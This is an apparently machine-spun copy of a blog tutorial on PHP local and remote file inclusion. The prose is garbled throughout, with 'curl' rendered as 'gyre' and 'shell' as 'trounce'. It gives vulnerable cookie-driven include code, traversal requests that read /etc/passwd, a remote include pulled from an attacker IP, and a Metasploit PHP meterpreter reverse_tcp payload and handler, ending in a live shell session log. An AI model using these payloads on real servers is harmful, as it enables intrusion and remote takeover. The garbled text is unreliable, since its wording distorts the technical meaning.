-->

Php Local As Well As Remote File Inclusion (Lfi, Rfi) Attacks

Php Local As Well As Remote File Inclusion (Lfi, Rfi) Attacks

PHP supports the powerfulness to ‘include’ or ‘require’ additional files inside a script. If unsanitized information is passed to such functions, an assaulter may live on able to become remote code execution access to the server. Influenza A virus subtype H5N1 typical include block mightiness human face something similar this:
1
2
3
4
5
6
7
<?php
require("config/settings.inc.php");
require("lib/db.lib.php");
require("lib/parser.lib.php");
include("contrib/users/user.contrib.php");
die("This is a test");
?>
Now, it’s every bit good possible to dynamically ask or include files based on variables or user input, say for example:

1
2
3
4
<?php
require("config/" . $username . ".inc.php");
die("This is a test");
?>
or
1
2
3
4
<?php
require("config/" . $_COOKIE['pref_file'] . ".inc.php");
die("This is a test");
?>
The work amongst the $_COOKIE[‘pref_file’] example, is that of class the user controls his ain cookies. In this case, rather than the expected value that mightiness live on ‘username_prefs_123456’ for example, the user tin give the sack railroad train a to a greater extent than malicious value. Ultimately, the spider web server volition too so include this malicious file too execute it every bit a PHP script. This malicious file volition accept the permissions to exercise anything that whatever other server side PHP scripts are able to do, which volition near probable enable the assaulter to make a shell. Let’s human face at unlike ways that the vulnerability tin give the sack live on leveraged.
Let’s telephone band our script ‘test.php’ too let’s exercise a sample valid include file, i.e. config/npn.inc.php for it containing a uncomplicated echo statement. Now running gyre too setting the ‘pref_file’ cookie to incorporate ‘npn’ results inwards the following:
1
2
3
4
root@pwn:/var/www# gyre http://localhost/test.php -b "pref_file=npn"
This is a seek include
This is a test
root@pwn:/var/www#
Exactly every bit nosotros expect!
Now, let’s say that nosotros desire to utilisation a Local File Inclusion (LFI) assail to include /etc/passwd instead. We are faced amongst 2 immediate issues. Firstly, “config/” is prepended to the begin of our pref_file cookie too secondly, “.inc.php” is appended to the end. Directory traversal too null bytes to the rescue!
If nosotros overstep a modified gyre request, our assail is successful:
1
2
3
4
5
6
7
8
9
root@pwn:/var/www# gyre http://localhost/test.php -b "pref_file=../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
...
Let’s examine our assail string inwards a piffling flake to a greater extent than detail. What’s directly beingness included is “config/../../../etc/passwd.inc.php”. By traversing the directory tree amongst ‘../’ nosotros tin give the sack seat ourselves three directories back, to the source ‘/’ of the filesystem earlier specifying the file that we’re interested inwards – /etc/passwd. By including a unmarried null byte ‘’, nosotros terminate the string, too thus anything after, i.e. ‘.inc.php’ is discarded past times PHP. Note that this null byte number inside paths was resolved inwards PHP 5.3.4
The minute LFI assail method involves beingness able to upload files to the filesystem. As an assaulter if nosotros tin give the sack detect other agency to become files onto the file organization such every bit through anonymous FTP, icon uploads, profile uploads, fifty-fifty PHP session variables containing arbitrary code, too nosotros tin give the sack teach the application to include these files inwards just the same vogue every bit above.
Now, nosotros come upward on to the to a greater extent than interesting remote file inclusion (RFI) attack. If PHP has ‘URL wrappers’ enabled, too so it’s possible to overstep HTTP links into functions such every bit include, require, fopen, too so on.
Take the sample code:
1
2
3
4
<?php
require($_COOKIE['pref_file'] . ".inc.php");
die("This is a test");
?>
If nosotros telephone band the script with: gyre http://localhost/test.php -b “pref_file=http://192.168.230.128/malicious”
1
2
3
root@pwn:/var/www# gyre http://localhost/test.php -b "pref_file=http://192.168.230.128/malicious"
You just included a malicious file!
This is a test
If the PHP version is non susceptible to the null byte attack, too so every bit seen above, every bit nosotros command our ain webserver, nosotros tin give the sack exercise ‘malicious.inc.php’ which includes the ‘.inc.php’ the application volition append, too merely overstep the string ‘/malicious’ to the application.
This article wouldn’t live on finished without trounce access! We tin give the sack generate our trounce with:
1
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 R > /var/www/malicious.inc.php
Set metasploit to psyche inwards for connections:
1
2
3
4
5
6
7
8
9
10
11
msf > utilisation exploit/multi/handler
msf exploit(handler) > railroad train LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > railroad train LPORT 8080
LPORT => 8080
msf exploit(handler) > railroad train payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
 
[*] Started opposite handler on 0.0.0.0:8080
[*] Starting the payload handler...
Now trigger the remote application to include our malicious file:
Our gyre asking hangs every bit the script kicks into action:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[*] Sending phase (39195 bytes) to 192.168.230.128
[*] Meterpreter session 1 opened (192.168.230.128:8080 -> 192.168.230.128:39890) at 2013-08-10 16:49:44 +0100
 
meterpreter > shell
Process 5960 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ps
  PID TTY          TIME CMD
 5611 ?        00:00:00 apache2
 5612 ?        00:00:00 apache2
 5613 ?        00:00:00 apache2
 5614 ?        00:00:00 apache2
 5615 ?        00:00:00 apache2
 5911 ?        00:00:00 apache2
 5912 ?        00:00:00 apache2
 5913 ?        00:00:00 apache2
 5960 ?        00:00:00 sh
 5970 ?        00:00:00 ps
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser